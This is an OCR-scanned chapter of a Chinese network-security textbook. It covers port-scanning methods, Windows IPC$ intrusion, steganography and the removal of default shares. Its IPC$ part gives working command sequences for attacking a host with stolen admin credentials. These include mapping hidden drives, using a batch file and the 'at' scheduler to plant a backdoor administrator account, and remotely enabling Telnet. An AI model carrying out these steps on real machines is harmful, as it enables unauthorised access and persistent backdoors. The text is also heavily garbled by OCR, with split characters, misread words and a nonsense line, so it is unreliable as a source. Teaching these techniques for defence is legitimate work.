标 端口 都 以 线性 的 方式 连接 ， 使 用 单独 的 connectO 调 用 ， 那 么 将 会 花费 相当 长 的 时 间 ， 这 
时 用 户 可 以 通过 同时 打开 多 个 套 接 字 ， 来 实现 加 速 扫描 。 使 用 非 阻塞 VO 允许 用 户 设置 一 
个 低 的 时 间 用 尽 周期 ， 同 时 观察 多 个 套 接 字 。 但 这 种 方法 的 缺点 是 很 容易 被 发 觉 ， 并 且 会 
被 过 滤 掉 。 目 标 计 算 机 的 logs 文件 会 显示 一 连 串 的 连接 和 连接 时 出 错 的 服务 消息 ， 并 且 能 
很 快 的 使 它 关 闭 。 

2) TCP SYN 扫描 

这 种 技术 通常 认为 是 “ 半 开 放 ” 扫 描 ， 这 是 因为 扫描 程序 不 必要 打开 一 个 完全 的 TCP 
连接 。 扫描 程序 发 送 的 是 一 个 SYN 数据 包 , 好 像 准备 打开 一 个 实际 的 连接 并 等 待 反应 一 样 
(参考 TCP 的 三 次 握手 建立 一 个 TCP 连接 的 过 程 )。 一 个 SYNIACK 的 返回 信息 表示 端口 处 
于 侦 听 状态 。 一 个 RST 返回 ， 表 示 端 口 没有 处 于 侦 听 状 。 如 果 收 到 一 个 SYNIACK， 则 扫 
描 程 序 必须 再 发 送 一 个 RST 信和 号， 来 关闭 这 个 连接 过 程 。 这 种 扫描 技术 的 优点 在 于 一 般 不 
会 在 目标 计算 机 上 留 下 记录 。 但 这 种 方法 的 一 个 缺点 是 ， 必 须要 有 root 权限 才能 建立 自己 
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的 SYN 数据 包 。 

3) TCP FIN 扫描 

有 的 时 候 可 能 SYN 扫描 也 不 够 秘密 。 一 些 防火 墙 和 包 过 滤器 会 对 一 些 指定 的 端口 进行 
监视 ， 有 的 程序 能 检测 到 这 些 扫描 。 相 反 ，FIN 数据 包 可 能 会 在 没有 任何 麻烦 的 情况 下 通 
过 。 这 种 扫描 方法 的 思想 是 : 关闭 的 端口 会 用 适当 的 RST 来 回复 FIN 数据 包 。 男 一 方面 ， 
打开 的 端口 会 忽略 对 FIN 数据 包 的 回复 。 这 种 方法 和 系统 有 一 定 的 关系 ， 有 的 系统 不 管 端 
口 是 否 打开 ， 都 回复 RST， 这 样 ， 这 种 扫描 方法 就 不 适用 了 。 并 且 这 种 方法 在 区 分 Unix 
和 NT 时 ， 是 十 分 有 用 的 。 

4) 卫 段 扫描 

这 种 不 能 算是 新 方法 ， 它 是 在 其 他 技术 的 基础 上 变化 而 来 的 。 它 并 不 是 直接 发 送 TCP 
探测 数据 包 ， 而 是 将 数据 包 分 成 两 个 较 小 的 他 段 后 进行 发 送 。 这 样 就 将 一 个 TCP 头 分 成 
好 几 个 数据 包 ， 所 以 过 滤器 就 很 难 探测 到 。 但 是 在 使 用 该 方法 时 必须 小 心 ， 一 些 程序 在 处 
理 这 些小 数据 包 时 会 产生 一 些 麻烦 。 

5) ”TCP 反 向 ident 扫描 

ident 协议 允许 (rfec1413) 看 到 通过 TCP 连接 的 任何 进程 搜 有 者 的 用 户 名 ,即使 这 个 连接 
不 是 由 这 个 进程 开始 的 。 举 个 例子 : 连接 到 http 端口 ， 然 后 用 identd 来 发 现 服务 器 是 否 正 
在 以 root 权限 运行 。 这 种 方法 只 能 在 和 目标 端口 建立 了 一 个 完整 的 TCP 连接 后 才能 看 到 。 

6) FTP 返回 攻击 

FTP 协议 的 一 个 有 趣 的 特点 是 它 支 持 代理 (proxy)FTP 连接 。 即 入 侵 者 可 以 从 自己 的 计 
算 机 acom 和 目标 主机 target.com 的 FTP server-PI( 协 议 解 释 器 ) 连 接 ， 建 立 一 个 控制 通信 连 
接 。 然 后 ， 请 求 这 个 server-PI 激活 一 个 有 效 的 server-DTP( 数 据 传输 进程 ) 来 给 Internet 上 任 
何 地 方 发 送 文件 。 对 于 一 个 UserDTP， 这 只 是 个 推出， 尽管 RFC 明确 地 定义 请 求 一 个 服 
务 器 发 送 文件 到 另 一 个 服务 器 是 可 以 的 。 但 现在 这 个 方法 并 不 是 非常 有 效 。 这 个 协议 的 缺 
点 是 “可 以 用 来 发 送 不 能 跟踪 的 邮件 和 新 闻 ， 给 许多 服务 器 造成 打击 ， 用 尽 磁盘 ”。 

我 们 利用 这 种 方法 的 目的 是 从 一 个 代理 的 FTP 服务 器 来 扫描 TCP 端口 。 这 样 , 用 户 能 
在 一 个 防火 墙 后 面 连接 到 一 个 FTP 服务 器 ， 然 后 扫描 端口 (这 些 原来 有 可 能 被 阻塞 )。 如 果 
FTP 服务 器 允许 从 一 个 目录 读 写 数据 ， 用 户 就 能 发 送 任意 的 数据 到 发 现 的 打开 的 端口 。 

端口 扫描 是 使 用 PORT 命令 来 表示 被 动 的 User DTP 正在 目标 计算 机 上 的 某 个 端口 侦 
听 。 然 后 入 侵 者 试图 用 LIST 命令 列 出 当前 目录 ， 结 果 通过 Server-DTP 发 送出 去 。 如 果 目 
标 主 机 正在 某 个 端口 侦 听 , 传输 就 会 成 功 (产生 一 个 150 或 226 的 回应 )。 否则 , 会 出 现 “425 
Can’t build data connection: Connection refused.”。 然 后 ， 使 用 另 一 个 PORT 命令 ， 尝 试 日 
标 计算 机 上 的 下 一 个 端口 。 这 种 方法 的 优点 很 明显 ， 难 以 跟踪 ， 能 穿 过 防火 墙 ， 主 要 缺点 
是 速度 很 慢 ， 有 的 FTP 服务 器 最 终 能 得 到 一 些 线索 ， 从 而 关闭 代理 功能 。 

这 种 方法 能 成 功 的 情景 : 


220 xxxxxxx.com FTP server (Version wu-2.4(3) Wed Dec 14) ready. 

220 xxx.xXxx.xxx.edu FTP server ready. 

220 xx.Telcom.xxxx.EDU FTP server (Version wu-2.4(3) Tue Jun 11) ready. 
220 lem FTP server (SunOS 4.1) ready. 


220 xxx.xxx.es FTP server (Version wu-2.4(11) Sat Apr 27) ready. 


由 移 和 2 草 ” 克 缔 及 南 与 盛 沁 


220 elios FTP server (SunOs 4.1) ready 

这 种 方法 不 能 成 功 的 情景 : 

220 wcarchive.cdrom.com FTP server (Version DG-2.0.39 Sun May 4) ready. 
220 xxx.Xxx.Xxxxxx.EDU Version wu-2.4.2-academ[BETA-12] (1) Fri Feb 7 

220 ftp Microsoft FTP Service (Version 3.0). 

220 xxx FTP server (Version wu-2.4.2-academ[BETA-11] (1) Tue Sep 3) ready. 
220 xxx.unc.edu FTP server (Version wu-2.4.2-academ[BETA-13] (6)) ready. 


7) ”UDP ICMP 端口 不 能 到 达 扫 描 

这 种 方法 与 上 面 几 种 方法 的 不 同 之 处 在 于 使 用 的 是 UDP 协议 。 由 于 这 个 协议 很 简单 ， 
所 以 扫描 变 得 相对 比较 困难 。 这 是 由 于 打开 的 端口 对 扫描 探测 并 不 发 送 一 个 确认 ， 关 闭 的 
端口 也 并 不 需要 发 送 一 个 错误 数据 包 。 幸运 的 是 , 许多 主机 在 用 户 向 一 个 未 打开 的 UDP 端 
口 发 送 一 个 数据 包 时 ， 会 返回 一 个 ICMP PORT _UNREACH 错误 ,这样 用 户 就 能 发 现 哪 个 
端口 是 关闭 的 。UDP 和 ICMP 错误 都 不 能 保证 到 达 , 因此 , 在 一 个 包 看 上 去 已 丢失 的 时 候 ， 
这 种 扫描 器 必须 实现 重新 传输 。 这 种 扫描 方法 是 很 慢 的 ， 因 为 RFC 对 ICMP 错误 消息 的 产 
生 速 率 做 了 规定 。 同 样 ， 这 种 扫描 方法 需要 具有 root 权限 。 

8) ”UDP recvfrom0 和 write0 扫描 

当 非 root 用 户 不 能 直接 读 到 端口 不 能 到 达 的 错误 时 ，Linux 能 间接 地 在 它们 到 达 时 通 
知 用 户 。 比 如 ， 对 一 个 关闭 的 端口 的 第 2 个 writeO 调 用 将 失败 。 在 非 阻塞 的 UDP 套 接 字 上 
调用 recvfromO 时 ， 如 果 ICMP 出 错 ， 还 没有 到 达 时 会 返回 EAGAIN- 重 试 。 如 果 ICMP 到 
达 时 ， 返 回 ECONNREFUSED 一 连接 被 拒绝 。 这 就 是 用 来 查看 端口 是 否 打开 的 技术 。 

9) ”ICMP echo 扫描 

这 并 不 是 真正 意义 上 的 扫描 。 但 有 时 通过 ping， 在 判断 一 个 网 络 上 主机 是 否 开机 时 非 
常 有 用 。 
典型 扫描 工具 Nmap 已 在 2.4.1 中 作 了 详细 的 介绍 。 


2.4.3 ”基于 认证 的 入 侵 防范 


1.1PC$ 入 侵 

IPC$ 本 来 主要 是 用 于 远程 管理 计算 机 的 ， 但 实际 上 往往 被 入 侵 者 用 来 与 远程 主机 实现 
通信 和 控制 。 入 侵 者 能 够 利用 它 做 到 : 建立 、 复 制 、 删 除 远 程 计算 机 文件 ， 在 远程 计算 机 
上 执行 命令 。 

1) ”远程 文件 操 

(1) IPC 相关 知识 : IPC 即 Intemet Process Connection 的 缩写 ， 可 理解 为 “命名 管道 ” 
资源 ， 用 来 在 两 台 计 算 机 进程 之 间 建 立 通信 连接 ， 而 IPC 后 面 的 9 是 Windows 系统 所 使 用 
的 隐藏 符号 ， 因 此 “IPC$” 表 示 隐 藏 的 IPC 共享 。 IPC$ 是 Windows NT/2000/XP/2003 的 一 
项 特有 功能 ， 通 过 它 一 些 网 络 程序 的 数据 交换 可 以 建立 在 它 上 面 ， 实 现 远程 访问 管理 计算 
机 。IPC 连接 就 好 像 是 挖 好 的 地 道 ， 通 信 程 序 就 通过 这 个 “地 道 ” 访 问 目标 主机 。 默 认 情 
况 下 IPC 是 共享 的 ， 通 过 它 ， 入 侵 者 能 实现 远程 控制 目标 主机 。 


Tt 
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上 述 Windows 系统 在 安装 完成 后 , 自动 设置 共享 的 目录 为 : C 盘 、.D 盘 、 上 盘 、 ADMIN 
目录 (CNWINNTN 等 ， 即 为 C$、D$、E$、ADMINS$ 等 。 但 这 些 共享 也 是 隐藏 的 ， 只 有 管理 
员 能 对 它们 进行 远程 操作 , 在 MS-DOS 中 键入 “net share ”命令 可 以 来 查看 本 机 共享 资源 。 

儿 个 常用 的 Dos 命令 : 

net user: 系统 账号 类 操作 。 

net localgroup: 系统 组 操作 。 

net use: 远程 连接 、 映 射 操作 。 

net send: 信使 命令 。 

net time: 查看 远程 主机 系统 时 间 。 

netstat -n: 查看 本 机 网 络 连接 状态 。 

nbtstat -a IP: 查看 指定 卫 主机 的 NetBIOS 信息 。 

(2) 实例 :下面 通过 一 个 实例 介绍 如 何 建立 和 断 开 IPC$ 连 接 ， 以 及 入 侵 者 如 何 将 远程 
磁盘 映射 到 本 地 的 。 通 过 IPC$ 连 接 进行 入 侵 的 条 件 是 已 获得 目标 主机 管理 员 账 号 和 密码 。 
具体 步骤 如 下 。 

Q@ 打开 cmd 命令 行 窗口 。 

@ 建立 IPC$ 连 接 。 

使 用 命令 : 

net use \\IP\IPC$ "PASSWD" /USER: "ADMIN" 与 目标 主机 建立 IPC$ 连 接 。 


参数 说 明 : 卫 一 目标 主机 的 卫 ; IPC$ 一 指明 是 IPC$ 连 接 : PASSWD 一 已 经 获得 的 管理 
员 密码 ，ADMIN 一 已 经 获得 的 管理 员 账 号 。 


net use \\192.168.1.60\ipc$ "" /user:"administrator" 


@ ”映射 网 络 驱 动 器 。 
使 用 命令 : 


net use Y: \\192.168.1.60\D$ 


该 命令 表示 把 目标 主机 192.168.1.60 上 面 的 隐藏 D 盘 映 射 为 本 机 的 立 盘 ,映射 成 功 后 ， 
打开 “我 的 电脑 ”会 发 现 多 出 一 个 立 盘 ， 上 面 写 着 “192.168.1.6”。 

@ 查找 指定 文件 。 

鼠标 右键 单 击 Y 盘 ， 在 弹出 的 菜单 中 单 击 “ 搜 索 ”， 输 入 要 查找 的 关键 字 “**”， 等 
待 一 会 儿 即 可 得 到 查找 结果 ， 可 以 将 找到 的 文件 进行 复制 、 粘 贴 等 操作 ， 像 对 本 地 磁盘 中 
的 文件 进行 操作 一 样 。 

@ ” 断 开 连接 。 

输入 “netuse* /del ”命令 断 开 所 有 的 IPCS$ 连 接 。 输 入 “netuse\ 目 标 IPPCS /del” 可 
以 删除 指定 目标 他 的 IPC$ 连 接 。 

2)” 留 后 门 账号 

(1) 相关 知识 。 

利用 批 处 理 bat 文件 和 计划 任务 来 达到 目的 。 下 面 是 一 些 相 关 的 DOS 命令 : 


at: 用 来 建立 计划 任务 。 

net time: 用 来 查看 目标 计算 机 系统 时 间 ， 以 便 使 用 计划 任务 指定 时 间 。 

netuser: 用 来 管理 计算 机 上 的 账号 。 

net user: 查看 账号 。 

net user name passwd /add: 建立 账号 。 

net user name passwd /del: 删除 账号 。 

net localgroup: 用 来 管理 工作 组 ， 用 法 同 net user。 

(2) 建立 后 门 账号 ， 步 又 如 下 。 

@ 编写 BAT 文 件 。 

打开 记事 本 ， 输 入 “net user emile 123456 /add” 和 “net localgroup administrators emile 
/add”， 然 后 把 文件 另存 为 “hackbat”， 保 存在 cmd 当前 默认 目录 下 。 

@ 与 目标 主机 建立 IPC$ 连 接 ， 以 192.168.1.60 为 例 进行 讲解 。 

打开 cmd 窗口 ， 分 别 执行 命令 : 


net use \\192.168.1.60\ipc$ "" /user:"administrator" 

net use 2z: \\192.168.1.60\C$ 

@ 复制 bat 文 件 到 目标 主机 。 

在 cmd 窗口 输入 copy hack.bat \192.168.1.60\C$,， 把 文件 复制 到 目标 位 置 ; 也 可 以 打开 
映射 驱动 器 用 图 形 界面 直接 进行 复制 操作 。 

@ ”通过 计划 任务 使 远程 主机 执行 hack.bat 文件 。 

首先 输入 “net time NIP” 查 看 远程 主机 的 系统 时 间 , 再 输入 “at NIP TIME COMMAND” 
命令 在 远程 主机 上 建立 计划 任务 。 

参数 说 明 : 卫 一 目标 主机 IP; TIME 一 设 定 计 划 任 务 执行 的 时 间 ; COMMAND 一 计划 
任务 要 执行 的 命令 ， 如 此 处 为 C:\hack.bat。 

计划 任务 添加 完毕 后 ， 使 用 命令 “net use * /del” 断 开 IPC$ 连 接 。 

@ ”验证 账号 是 否 成 功 建立 。 

等 待 一 段 时 间 ， 估 计 远 程 主机 已 经 执行 hack.bat 文件 后 ， 通 过 用 新 账号 建立 IPC$ 连 接 
来 验证 是 否 成 功 建立 “emile” 账 号 ， 连 接 成 功 则 说 明 账号 成 功 建立 。 

3) ”IPCS$ 空 连接 漏洞 

(1) 漏洞 描述 : IPC$ 本 来 要 求 客户 机 要 有 足够 权限 才能 连接 到 目标 主机 ， 然 而 IPC$ 连 
接 漏洞 允许 客户 端 只 使 用 空 用 户 名 、 空 密码 就 可 以 与 目标 主机 成 功 建立 连接 。 入 侵 者 利用 
该 漏洞 可 以 与 目标 主机 进行 空 连接 ， 但 无 法 执行 管理 类 操作 ， 例 如 不 能 执行 映射 网 络 驱动 
器 、 上 传 文件 、 执 行 脚本 等 命令 。 虽 然 入 侵 者 不 能 通过 该 漏洞 直接 得 到 管理 员 权限 ， 但 也 
可 用 来 探测 目标 主机 的 一 些 关 键 信息 ， 在 “信息 搜集 ”中 发 挥 一 定 的 作用 。 

(2) 实例 : 通过 IPCS$ 空 连接 获取 信息 ， 步 又 如 下 。 

@ 建立 IPCS$ 空 连接 ， 如 果 空 连接 建立 成 功 ， 反 映 了 目标 主机 的 “不 坚固 ”程度 。 

@ 键入 “net time \IP” 查 看 目标 主机 的 时 间 信 息 ， 入 侵 者 可 以 通过 目标 主机 的 时 间 
信息 ， 推 断 出 目标 主机 所 在 的 国家 或 地 区 。 

@ ”获取 目标 主机 上 的 用 户 信息 ,，USERINFO.exe 和 X-Scan 是 常用 的 两 款 获取 用 户 信 
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息 的 工具 。 

@ USERINFO 是 利用 IPCS$ 漏 洞 来 查看 目标 主机 用 户 信 息 的 工具 ， 通 过 USERINFO 
来 查看 目标 主机 用 户 信息 的 时 候 ， 并 不 需要 事先 建立 IPC$ 空 连接 。 命 令 : 
USERINFO \IP USER 用 来 查看 目标 卫 上 USER 用 户 信息 , 然后 根据 反馈 的 结果 
进行 具体 分 析 。 

@  X-Scan 扫描 器 也 是 利用 目标 主机 存在 的 PCS$ 空 连接 漏洞 , 获取 用 户 信息 ,用 法 略 。 

4) IPC$ 入 侵 常 见 问题 

(1) 与 远程 主机 建立 IPC$ 连 接 , 本 地 机 需要 具备 的 条 件 是 : 操作 系统 是 Windows 2000 
及 以 上 ， 而 不 能 使 用 Windows 9x; 本 地 机 也 应 开放 IPCS$, 在 获得 远程 主机 管理 员 账 号 和 密 
码 的 情况 下 , IPC$ 才 能 建立 成 功 , IPCS$ 空 连接 除外 。 远程 主机 需要 具备 的 条 件 是 : 开放 IPCS$ 
共享 ; 运行 Server 服务 。 

(2) IPC$ 是 基于 账号 和 密码 的 ， 拥 有 远程 主机 管理 员 账 号 和 密码 能 成 功 建立 IPC$， 而 
且 拥 有 相应 账号 的 权限 ; 使 用 IPCS$ 空 连接 虽然 能 与 远程 主机 建立 连接 ， 但 该 连接 没有 任何 
权限 ， 也 就 是 说 未 授权 者 不 能 通过 IPC$ 空 连接 控制 远程 主机 。 

(3) 当 与 远程 主机 建立 IPCS$ 成 功 ， 但 复制 文件 失败 。 如 果 是 用 管理 员 账 号 与 远程 主机 
建立 的 连接 而 不 是 IPCS$ 空 连接 ， 则 复制 失败 说 明 远 程 主机 关闭 了 C 盘 、D 盘 等 默认 共享 资 
源 ， 这 时 候 可 以 用 计划 任务 开启 这 些 共 享 资源 ， 如 “at \192.168.1.60 15:30 net share 
Cpan=C:\”。 

(4) 一 些 常 见 系 统 错误 。 


错误 号 5 一 一 权限 不 足 ， 错 误 号 51 一 一 Windows 无 法 找到 网 络 路 径 ， 网 络 有 问题 ， 错 
误 号 53 一 一 找 不 到 网 络 路 径 ，IP 地 址 错误 ， 目 标 没 开机 ， 目 标 server 服务 未 启动 ， 目 标 有 


防火 墙 (端口 过 滤 ) 或 没有 IPC$; 错误 号 67 一 一 找 不 到 网 络 名 ， 用 户 的 workstation 服务 未 启 
动 ， 目 标 删除 了 IPC$; 错误 号 1219 一 一 提供 的 凭据 与 已 存在 的 凭据 起 冲突 ， 用 户 已 经 和 
对 方 建立 了 一 个 IPC$， 请 删除 后 再 连接 ， 错 误 号 1326 一 一 未 知 的 用 户 名 或 错误 密码 ， 错 
误 号 1792 一 一 试图 登录 ， 但 网 络 登录 服务 没 启动 ， 目 标 NetLogon 服务 未 启动 ;错误 号 
2242 一 一 此 用 户 的 密码 已 过 期 ， 目 标 有 账号 策略 ， 强 制定 期 要 求 更 改 密码 。 

2. 远程 管理 计算 机 

必须 是 Administrator 组 的 成 员 才 能 完全 使 用 “计算 机 管理 ”， 和 否则 没有 查看 或 修改 管 
理 属性 的 权限 ， 并 且 没 有 执行 管理 任务 的 权限 。 

1) “远程 管理 

(1) 相关 知识 : Telnet 用 于 提供 远程 登录 服务 ， 当 终端 用 户 登 录 到 提供 这 种 服务 的 主 
机 时 ， 就 会 得 到 一 个 Shell( 命 令 行 )， 通 过 这 个 Shell， 终 端 用 户 可 以 执行 远程 主机 上 的 任何 
程序 ; 同时 用 户 将 作为 这 台 主 机 的 终端 来 使 用 该 主机 的 CPU 和 内 存 资 源 ， 实 现 完全 控制 远 
程 主机 ，Telnet 登录 控制 是 入 侵 者 常用 的 一 种 方式 。 


Telnet 命令 : 


telnet IP [Port] 一 默认 端口 为 23 


(2) 实例 : 开启 远程 计算 机 “计划 任务 ”和 “Telnet” 服 务 。 步 又 如 下 。 
@ 建立 IPC$ 连 接 ， 还 是 以 192.168.1.60 为 例 ， 过 程 略 。 


@ 管理 远程 计算 机 。 

打开 “计算 机 管理 ”界面 ， 在 界面 中 选择 “操作 (A)” 一 “连接 到 另 一 台 计 算 机 (c)” 
选项 ， 在 弹出 的 “选择 计算 机 ”窗口 中 的 “名 称 ” 栏 中 填 入 目标 主机 IP“192.168.1.60”， 
然后 单 击 “ 确 定 ” 按 钮 显示 界面 。 

上 述 过 程 中 如 果 出 现 “ 输 入 用 户 名 和 密码 ”， 就 需要 再 次 输入 用 户 名 和 密码 ， 该 用 户 
名 和 密码 可 以 与 建立 IPC$ 连 接 时 使 用 的 相同 ， 也 可 以 不 同 ， 这 都 不 会 影响 以 后 的 操作 ， 但 
这 个 用 户 一 定 要 拥有 管理 员 权 限 。 

@ 开启 “计划 任务 ”服务 。 

在 “计算 机 管理 ”界面 中 ， 单 击 “ 服 务 和 应 用 程序 ”前 面 的 “+” 展 开 项 目 ， 然 后 在 展 
开 的 项 目 中 选择 “服务 ”选项 ， 右 侧 出 现 的 列表 即 是 远程 计算 机 的 服务 列表 ， 在 “名 称 ” 
中 找到 Task Scheduler， 在 其 上 双击 打开 设置 对 话 框 。 在 “Task Scheduler 的 属性 ”窗口 中 ， 
把 “启动 类 型 ”选择 为 “自动 ”， 然 后 在 “服务 状态 ”中 单 击 “ 启 动 ” 来 启动 Task Scheduler 
服务 ， 这 样 设置 后 ， 该 服务 会 在 每 次 开机 时 自动 启动 。 

@ 开启 Telnet 服务 。 

在 服务 列表 中 找到 Telnet， 在 其 上 双击 打开 “Telnet 服务 的 属性 ”窗口 ， 按 照 前 面 所 讲 
样 的 方法 把 该 服务 启动 类 型 设置 为 “自动 ”， 将 服务 状态 设置 为 “已 启动 ”。 

@” 断 开 连接 。 

关闭 “计算 机 管理 ”界面 后 ， 还 需要 手工 键入 命令 “net use * /del” 来 断 开 IPC$ 连 接 。 

2) ”查看 信息 

(1) 日 志 : “系统 工具 ”下 的 “事件 查看 器 ”是 用 来 查看 关于 “应 用 程序 ”、“ 安 全 
性 ”、 “系统 ”这 3 个 方面 的 日 志 。 应 用 程序 日 志 包 含 由 应 用 程序 或 系统 程序 记录 的 事件 。 
例如 ， 数 据 库 程序 可 在 应 用 程序 日 志 中 记录 文件 错误 ， 而 程序 员 决 定 记录 哪 一 个 事件 。 系 
统 日 志 包 含 Windows 系统 组 件 记 录 的 事件 。 例如， 在 启动 过 程 中 将 加 载 的 驱动 程序 或 其 他 
系统 组 件 的 失败 信息 记录 在 系统 日 志 中 。 安 全 性 日 志 可 以 记录 安全 事件 ， 如 有 效 的 和 无 效 
的 登录 尝试 ， 以 及 与 创建 、 打 开 或 删除 文件 等 资源 使 用 相关 联 的 事件 。 管 理 器 可 以 指定 在 
安全 日 志 中 记录 什么 事件 。 例 如 ， 如 果 已 启用 登录 审核 ， 登 录 系统 的 尝试 将 记录 在 安全 日 
志 里 。 

(2) 共享 信息 及 共享 会 话 : 通过 “计算 机 管理 ”可 以 查看 该 机 器 的 共享 信息 和 共享 会 
话 (IPC$ 也 属于 这 种 会 话 )。 在 “共享 ”中 可 以 查看 该 机 器 开放 的 共享 资源 ， 除 了 查看 共享 
资源 外 ， 还 可 通过 此 处 来 建立 共享 ， 管理 员 也 可 以 通过 “会 话 ” 来 查看 计算 机 是 否 与 远程 
主机 存在 IPC$ 连 接 , 借 此 获取 入 侵 者 的 他 地 址 (就 在 “系统 工具 ”一 “共享 文件 夹 ” 一 “会 
话 ” 下 查看 )。 

(3) 用 户 和 组 : 可 以 通过 “计算 机 管理 ”查看 远程 主机 用 户 和 组 的 信息 ， 不 过 不 能 在 
这 里 执行 “新 建 用 户 ” 和 “删除 用 户 ” 操 作 。 

3) ”开启 远程 主机 服务 的 其 他 办 法 

(1) 通过 “BAT 文件 ”和 “计划 任务 服务 ”开启 远程 主机 服务 的 操作 步 又 如 下 。 

GD 编写 BAT 文件 ， 内 容 为 “net start telnet”， 另 存 为 tel.bat。 

@ 建立 IPC$ 连 接 ， 把 tel.bat 文件 复制 到 远程 主机 。 

图 使 用 “nettime 目标 也 ”查看 远程 主机 系统 时 间 , 然后 用 “at\ 目 标 亿 计划 time 命 
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令 ” 建 立 计 划 任 务 。 

需要 注意 的 是 ， 如 果 远 程 主机 禁用 了 Telnet 服务 ， 这 种 方法 将 失败 。 

(2) 使 用 工具 netsvc.exe 开启 远程 主机 服务 。 

netsvc 是 微软 公司 NT 系统 中 附带 的 一 个 管理 工具 , 用 于 开启 远程 主机 上 的 服务 , 这 种 
方法 不 需要 通过 远程 主机 的 “计划 任务 服务 ”。 

命令 格式 : 


netsvc \\IP SVC /START 


其 中 下 为 目标 主机 也 ，SVC 为 预 开启 的 服务 名 ，/START 表示 开启 服务 。 
例子 : 


netsvc \\192.168.1.60 telnet /start 开启 远程 主机 的 telnet 服务 


4) ”常见 问题 

(1) 使 用 “计算 机 管理 ”与 远程 主机 连接 失败 的 原因 : 没有 获取 远程 主机 的 管理 员 账 
号 和 密码 ;目标 主机 禁用 了 server 服务 ;错误 的 下 地址 ;目标 主机 不 是 WinNT/2000/XP/2003 
操作 系统 。 

(2) 有 时 候 使 用 “计算 机 管理 ”与 远程 主机 建立 连接 ， 但 无 法 查看 该 主机 上 的 “本 地 
用 户 和 组 ”， 这 是 正常 的 ， 可 以 采用 其 他 方法 查看 ， 这 里 不 再 详 述 。 

(3) 使 用 “计算 机 管理 ”与 远程 主机 建立 连接 ， 开 启 “Telnet 服务 ” 均 成 功 ， 但 无 法 
登录 远程 主机 ， 这 是 由 于 微软 为 了 增加 Telnet 服务 的 安全 性 而 添加 的 一 项 NTLM 验证 ， 正 
是 这 个 验证 导致 非 授 权 主机 的 Telnet 登录 失败 。 


2.4.4 ”信息 隐藏 技术 


Information Hiding， 也 就 是 信息 隐藏 ， 将 在 未 来 网 络 中 保护 信息 不 受 破坏 方面 起 到 重 
要 作用 ， 信 息 隐 藏 是 把 机 密 信息 隐藏 在 大 量 信息 中 从 而 不 让 对 手 发 觉 的 一 种 方法 。 信 息 隐 
藏 的 方法 主要 有 隐 写 术 、 数 字 水 印 技术 、 可 视 密 码 、 潜 信道 、 隐 匿 协议 等 5 种 。 

下 面 将 重点 介绍 一 下 隐 写 术 、 数 字 水 印 技术 和 可 视 密码 技术 。 

1)” 隐 写 术 (Steganography) 

隐 写 术 就 是 将 秘密 信息 隐藏 到 看 上 去 普通 的 信息 (如 数字 图 像 ) 中 进行 传送 。 现 有 的 隐 
写 术 方法 主要 有 : 利用 高 空间 频率 的 图 像 数据 隐藏 信息 、 采 用 最 低 有 效 位 方法 将 信息 隐藏 
到 宿主 信号 中 、 使 用 信号 的 色 度 隐藏 信息 、 在 数字 图 像 的 像素 亮度 的 统计 模型 上 隐藏 信息 、 
Patchwork 方法 等 。 当 前 很 多 隐 写 方法 都 是 基于 文本 及 其 语言 的 隐 写 术 ， 如 基于 同义词 替换 
的 文本 隐 写 术 ，an efficient linguistic steganography for chinese text 一 文 就 描述 了 采用 中 文 的 
同义词 替换 的 算法 。 其 他 的 文本 隐 写 术 有 基于 文本 格式 隐 写 术 等 。 
2) ”数字 水 印 技术 (Digital Watermark) 
该 技术 是 将 一 些 标识 信息 ( 即 数字 水 印 ) 直 接 嵌 入 数字 载体 (包括 多 媒体 、 文 档 、 软 件 等 ) 
当中 ， 但 不 影响 原 载体 的 使 用 价值 ， 也 不 容易 被 人 的 感知 系统 (如 视觉 或 听觉 系统 ) 觉 察 或 
注意 到 。 目 前 主要 有 两 类 数字 水 印 : 一 类 是 空间 数字 水 印 ， 另 一 类 是 频率 数字 水 印 。 空 间 
数字 水 印 的 典型 代表 是 最 低 有 效 位 (LSB) 算 法 , 其 原理 是 通过 修改 表示 数字 图 像 的 颜色 或 颜 
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色 分 量 的 位 平面 ， 调 整数 字 图 像 中 感知 不 重要 的 像素 来 表达 水 印 的 信息 ， 以 达到 嵌入 水 印 
的 目的 。 频 率 数字 水 印 的 典型 代表 是 扩展 频谱 算法 ， 其 原理 是 通过 时 频 分 析 ， 根 据 扩展 频 
谱 特 性 ， 在 数字 图 像 的 频率 域 上 选择 那些 对 视觉 最 敏感 的 部 分 ， 使 修改 后 的 系数 隐 含 数字 
水 印 的 信息 。 

3) ”可 视 密码 技术 

可 视 密码 技术 是 Naor 和 Shamir 于 1994 年 首次 提出 的 , 其 主要 特点 是 恢复 秘密 图 像 时 
不 需要 任何 复杂 的 密码 学 计算 ， 而 是 以 人 的 视觉 即 可 将 秘密 图 像 辨 别 出 来 。 其 做 法 是 产生 
n 张 不 具有 任何 意义 的 胶片 , 任 取 其 中 t 张 胶片 登 合 在 一 起 即 可 还 原 出 隐藏 在 其 中 的 秘密 信 
息 。 其 后 ， 人 们 又 对 该 方案 进行 了 改进 和 发 展 。 主 要 的 改进 办 法 有 : 使 产生 的 n 张 胶片 都 
有 一 定 的 意义 ， 这 样 做 更 具有 迷惑 性 ; 改进 了 相关 集合 的 方法 ， 将 针对 黑白 图 像 的 可 视 秘 
密 共享 扩展 到 基于 灰 度 和 彩色 图 像 的 可 视 秘密 共享 中 。 


2.4.5 ”安全 解决 方案 


为 阻止 入 侵 者 利用 IPCS$ 入 侵 ， 有 如 下 工作 要 做 。 

1. 删除 默认 共享 

(1) 首先 了 解 本 机 共享 资源 ， 在 cmd 窗口 输入 “net share” 命 令 。 
(2) 删除 共享 资源 。 

方法 一 : 通过 BAT 文件 执行 删除 共享 资源 命令 。 

首先 建立 BAT 文件 (如 noshare.bat)， 输 入 如 下 内 容 。 


net share ipc$ /del 
net share admin$ /del 
net share C$ /del 
net share D$ /del 


如 果 有 其 他 盘 符 ， 可 以 继续 添加 。 然 后 保存 该 文件 后 ， 复 制 到 本 机 “开始 ”一 “程序 ” 
一 “启动 ”中 ， 以 后 每 次 开机 都 会 自动 执行 该 BAT 文件 来 删除 默认 共享 。 如 果 以 后 需要 使 
用 共享 资源 ， 可 以 使 用 “net share 共享 名 ”命令 来 打开 。 

方法 二 : 通过 修改 注册 表 来 删除 默认 共享 。 

打开 注册 表 ， 按 不 同 操作 系统 进行 如 下 不 同 修改 。 


Windows 2000 server 版 : 

Key:HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver 
\parameters 

新 建 Name :AutoShareServer 

Type :DWORD ( 双 字 节 ) 

Value:0 

Windows 2000 station 版 : 

Key:HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver 


\parameters 


© 
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Q 


